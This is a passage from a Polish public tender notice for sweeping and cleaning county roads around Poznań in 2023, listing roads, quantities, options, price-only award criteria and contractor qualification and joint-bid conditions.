Zamówienie zostanie udzielone, jeśli zaistnieje potrzeba wykonania wyżej<br/>wymienionych usług oraz jeżeli Zamawiający będzie posiadał niezbędne środki finansowe, na podstawie odrębnej umowy.<br/>Zamówienie zostanie udzielone, jeżeli dotychczasowy Wykonawca realizuje lub zrealizował usługę należycie oraz zapewni standard<br/>wykonania usługi nie gorszy od standardu wykonania zamówienia podstawowego, a ponadto zaakceptuje istotne warunki<br/>dotychczasowej umowy, z zastrzeżeniem, negocjacji wynagrodzenia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazane w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest: Sprzątanie z zanieczyszczeń jezdni i wybranych elementów pasa dróg powiatowych administrowanych przez Zarząd Dróg Powiatowych w Poznaniu.<br/>Część III – drogi powiatowe na terenie gmin: Murowana Goślina, Czerwonak, Kostrzyn, Pobiedziska, Swarzędz.<br/>W skład zamówienia wchodzi: <br/>a)	zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. , oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b)	opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych, <br/>c)	opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zlecenie wykonywania każdej z opcji zależeć będzie od potrzeb Zamawiającego oraz posiadania przez Zamawiającego środków finansowych. Oznacza to, że Zamawiający może zrezygnować z każdej opcji w całości lub wykorzystać każdą opcję w niepełnym zakresie. Zamawiający zastrzega sobie prawo sukcesywnego zlecania wykonania usług w ramach każdej opcji.<br/>Warunkiem skorzystania z zamówienia w ramach prawa opcji jest złożenie przez Zamawiającego oświadczenia w formie pisemnej lub w formie elektronicznej w terminie do dnia 01 września 2023 r. o skorzystaniu z opcji.<br/>Brak oświadczenia woli ze strony Zamawiającego o skorzystaniu z prawa opcji nie może stanowić podstaw do realizacji zamówienia opcjonalnego przez Wykonawcę.<br/>Zakres zamówienia obejmuje: <br/>a)	zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych na łącznej długości 59 451mb i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. na łącznej powierzchni 23 853 m² oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b)	opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. na łącznej długości 59 451 mb i na łącznej powierzchni 23 853m² - oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych, <br/>c)	opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni, łącznie w maksymalnym zakresie 51 350 m2. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Wykonanie<br/>jednokrotnego oczyszczania na drogach powiatowych zgodnie z poniższym wykazem dróg:<br/>m. Bolechowo - Promnice 2406P 1050mb, 2320mb 420m2 w tym zatoki autobusowe<br/>620mb rondo str. zew. i wew.<br/>150m2 zatoki parkingowe, zatoka przy separatorach<br/>220mb 220mb most na rzece Warcie<br/>4500m2 droga pieszo-rowerowa 1500m<br/>m. Owińska ul. Kolejowa 2434P 840mb 110mb 560m2 w tym zatoki, parkingi, azyle<br/>m. Koziegłowy ul. Poznańska 2407P 1100mb; 1600mb; 420m2 w tym zatoki<br/>m. Kicin ul. Poznańska (od ul. Szkolnej do ul. Rolnej) 2407P 880mb; 2130mb; 315m2 w tym ściek głęboki oraz zatoki autobusowe<br/>m. Kliny 2407P 120mb; 60mb; 240m2 w tym zatoki<br/>m. Mielno 2407P 210mb; 40mb; 300m2 zatoki autobusowe<br/>m. Wierzonka 2407P 20mb 20mb<br/>12mb 13mb most nad rzeką Główna<br/>m. Kobylnica 2407P 140mb; 160mb<br/>odc. Gruszczyn - Swarzędz 2407P 290mb; 240mb; 240m2 zatoka, wokół wysp, azyli, lewoskręty<br/>50mb; 50mb rondo str. wew. i zewn.<br/>900mb; 900mb; 190m2 zatoka, wokół wysp, azyli, lewoskręty<br/>2700m2 droga pieszo-rowerowa<br/>m. Biskupice ul. Dworcowa 2437P 910mb; 660mb<br/>m. Biskupice ul. Główna 2485P 1050mb; 800mb<br/>m. Swarzędz, ul. Rabowicka 2512P 4235mb; 4235mb; 30m2 w tym wyspy 280,0mb; druga jezdnia przy posesjach 410,0mb;<br/>wiadukt; łącznice<br/>m. Swarzędz, Zalasewo ul. Średzka 2410P 570mb; 990mb; 175m2 w tym wokół wysp, martwe pola, zatoki autobusowe<br/>Zakres: oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok<br/>autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na<br/>skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni.<br/>Warunki udzielenia wyżej wymienionego zamówienia: Zamówienie zostanie udzielone, jeśli zaistnieje potrzeba wykonania wyżej<br/>wymienionych usług oraz jeżeli Zamawiający będzie posiadał niezbędne środki finansowe, na podstawie odrębnej umowy.<br/>Zamówienie zostanie udzielone, jeżeli dotychczasowy Wykonawca realizuje lub zrealizował usługę należycie oraz zapewni standard<br/>wykonania usługi nie gorszy od standardu wykonania zamówienia podstawowego, a ponadto zaakceptuje istotne warunki<br/>dotychczasowej umowy, z zastrzeżeniem, negocjacji wynagrodzenia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazane w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest: Sprzątanie z zanieczyszczeń jezdni i wybranych elementów pasa dróg powiatowych administrowanych przez Zarząd Dróg Powiatowych w Poznaniu.<br/>Część IV – drogi powiatowe na terenie gmin: Kleszczewo, Kórnik.<br/>W skład zamówienia wchodzi: <br/>a)	zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. , oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b)	opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych, <br/>c)	opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zlecenie wykonywania każdej z opcji zależeć będzie od potrzeb Zamawiającego oraz posiadania przez Zamawiającego środków finansowych. Oznacza to, że Zamawiający może zrezygnować z każdej opcji w całości lub wykorzystać każdą opcję w niepełnym zakresie. Zamawiający zastrzega sobie prawo sukcesywnego zlecania wykonania usług w ramach każdej opcji.<br/>Warunkiem skorzystania z zamówienia w ramach prawa opcji jest złożenie przez Zamawiającego oświadczenia w formie pisemnej lub w formie elektronicznej w terminie do dnia 01 września 2023 r. o skorzystaniu z opcji.<br/>Brak oświadczenia woli ze strony Zamawiającego o skorzystaniu z prawa opcji nie może stanowić podstaw do realizacji zamówienia opcjonalnego przez Wykonawcę.<br/>Zakres zamówienia obejmuje: <br/>a)	zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych na łącznej długości 47 935mb i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. na łącznej powierzchni 24 418 m² oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b)	opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. na łącznej długości 47 935 mb i na łącznej powierzchni 24 418m² - oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych, <br/>c)	opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni, łącznie w maksymalnym zakresie 25 905 m2. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Wykonanie<br/>jednokrotnego oczyszczania na drogach powiatowych zgodnie z poniższym wykazem dróg:<br/>Część IV (Gminy Kleszczewo, Kórnik)<br/>m. Kleszczewo 2410P 1250mb; 1350mb; 144m2 w tym wokół wysepek i dojazd do ronda<br/>m. Kleszczewo 2441P 430mb; 430mb<br/>m. Tulce 2438P 50mb; 50mb zatoki autobusowe<br/>50mb; 75mb zatoki autobusowe<br/>55mb<br/>m. Tulce 2440P 320mb; 700mb<br/>m. Tulce 2429P 130mb; 130mb zatoki autobusowe<br/>530mb; 615mb<br/>odc. Tulce - Żerniki dawna DW433 70mb; 70mb zatoki autobusowe<br/>3520mb; 1270mb; 350m2 rondo wew. I zew., wokół wysp, martwe pola, ściek głęboki na mostach , lewoskręty m. Biernatki 2468P 880mb; 520mb; 110m2 zatoka autobusowa<br/>m. Kamionki 2461P 1325mb; 1340mb; 40m2 przy chodniku, rondo wew. i zew., wokół wysp, martwe pola<br/>m. Borówiec ul. Poznańska, ul. Główna 2461P 3800mb; 3800mb; 857m2 zatoki autobusowe, 2 ronda po str. wew. i wokół wysepek<br/>Zakres: oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok<br/>autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na<br/>skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni.<br/>Warunki udzielenia wyżej wymienionego zamówienia: Zamówienie zostanie udzielone, jeśli zaistnieje potrzeba wykonania wyżej<br/>wymienionych usług oraz jeżeli Zamawiający będzie posiadał niezbędne środki finansowe, na podstawie odrębnej umowy.<br/>Zamówienie zostanie udzielone, jeżeli dotychczasowy Wykonawca realizuje lub zrealizował usługę należycie oraz zapewni standard<br/>wykonania usługi nie gorszy od standardu wykonania zamówienia podstawowego, a ponadto zaakceptuje istotne warunki<br/>dotychczasowej umowy, z zastrzeżeniem, negocjacji wynagrodzenia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazane w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest: Sprzątanie z zanieczyszczeń jezdni i wybranych elementów pasa dróg powiatowych administrowanych przez Zarząd Dróg Powiatowych w Poznaniu.<br/>Część V – drogi powiatowe na terenie gmin: Komorniki, Mosina.<br/>W skład zamówienia wchodzi: <br/>a)	zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. , oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b)	opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych, <br/>c)	opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zlecenie wykonywania każdej z opcji zależeć będzie od potrzeb Zamawiającego oraz posiadania przez Zamawiającego środków finansowych. Oznacza to, że Zamawiający może zrezygnować z każdej opcji w całości lub wykorzystać każdą opcję w niepełnym zakresie. Zamawiający zastrzega sobie prawo sukcesywnego zlecania wykonania usług w ramach każdej opcji.<br/>Warunkiem skorzystania z zamówienia w ramach prawa opcji jest złożenie przez Zamawiającego oświadczenia w formie pisemnej lub w formie elektronicznej w terminie do dnia 01 września 2023 r. o skorzystaniu z opcji.<br/>Brak oświadczenia woli ze strony Zamawiającego o skorzystaniu z prawa opcji nie może stanowić podstaw do realizacji zamówienia opcjonalnego przez Wykonawcę.<br/>Zakres zamówienia obejmuje: <br/>a)	zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych na łącznej długości 53 537mb i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. na łącznej powierzchni 22 944 m² oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b)	opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. na łącznej długości 53 537 mb i na łącznej powierzchni 22 944m² - oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych, <br/>c)	opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni, łącznie w maksymalnym zakresie 15 070 m2. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Wykonanie<br/>jednokrotnego oczyszczania na drogach powiatowych zgodnie z poniższym wykazem dróg:<br/>Cześć V (Gminy Komorniki, Mosina)<br/>m. Komorniki 2388P 200mb; 200mb<br/>2387P 70mb wyspa<br/>2387P 50mb; 50mb<br/>2387P 940mb; 860mb<br/>2391P 1800mb w tym 220m pas wewnętrzny, 30m wyspa, 30m zatoka<br/>1280mb w tym 30m wyspa, 220m pas wewnętrzny, 230m parking<br/>Komorniki - Wiry - Łęczyca 2390P 4900mb; 5780mb; 3260m2 w tym 60m wokół wysepki, zatoki 5szt, 110mb korytek betonowych, m.<br/>postojowe odc. Czapury - Babki ul. Gromadzka 2461P 2220mb; 2380mb<br/>m. Daszewice 2461P 1250mb; 1250mb<br/>m. Czapury - Wiórek 2460P 2285mb; 2650mb<br/>m. Sasinowo 2460P 1020mb<br/>m. Rogalinek 2460P 360mb; 360mb<br/>Zakres: oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok<br/>autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na<br/>skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni.<br/>Warunki udzielenia wyżej wymienionego zamówienia: Zamówienie zostanie udzielone, jeśli zaistnieje potrzeba wykonania wyżej<br/>wymienionych usług oraz jeżeli Zamawiający będzie posiadał niezbędne środki finansowe, na podstawie odrębnej umowy.<br/>Zamówienie zostanie udzielone, jeżeli dotychczasowy Wykonawca realizuje lub zrealizował usługę należycie oraz zapewni standard<br/>wykonania usługi nie gorszy od standardu wykonania zamówienia podstawowego, a ponadto zaakceptuje istotne warunki<br/>dotychczasowej umowy, z zastrzeżeniem, negocjacji wynagrodzenia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazane w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące zdolności technicznej lub zawodowej:<br/>a)	Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum jedną usługę polegającą na sprzątaniu zanieczyszczeń z jezdni i elementów pasa dróg, o wartości nie mniejszej niż 30 000,00 PLN brutto,<br/>b)	Wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował łącznie minimum:<br/>-	zmywarko - zamiatarka – 1 szt.,<br/>-	zmywarko - zamiatarka lub zamiatarka o DMC do 2,5t do oczyszczania chodników i dróg rowerowych – 1szt.<br/>Wykonawca składając ofertę na więcej niż jedną część zamówienia, musi wykazać dysponowanie osobnym kompletem sprzętu w odniesieniu do każdej części zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca sporządza ofertę na formularzu ofertowym stanowiącym załącznik nr 1 do SWZ dołączając formularz cenowy,<br/>będący nierozłącznym elementem formularza ofertowego, stanowiący załącznik nr 2A – 2E do SWZ. Ponadto wraz z ofertą<br/>Wykonawca składa:<br/>1) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania,<br/>2) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu,<br/>3) Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów,<br/>4) Pełnomocnictwo, jeżeli zachodzą okoliczności, o których mowa w ust. 4 Rozdz. XIII SWZ,<br/>5) Oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu z postępowania (jeśli dotyczy),<br/>6) Oświadczenie podmiotu udostępniającego zasoby o spełnianiu warunków udziału w postępowaniu (jeśli dotyczy),<br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VIII ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>4)	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5)	W przypadku Wykonawców składających ofertę wspólną:<br/>a)	Określone warunki udziału w postępowaniu winien spełniać jeden Wykonawca lub Wykonawcy wspólnie,<br/>b)	w stosunku do żadnego z nich nie mogą istnieć podstawy do wykluczenia, określone w ust. 2, dwa z indeksem jeden i 3, Rozdział VII ust. 12 SWZ.<br/>6)	Wspólnicy spółki cywilnej traktowani są jak Wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający działając zgodnie z przepisami art. 455 ust. 1 pkt 1 ustawy Pzp, przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. <br/>2.	Zmiany w umowie mogą dotyczyć:<br/>1)	podwykonawstwa, zmiana szczegółowo opisana 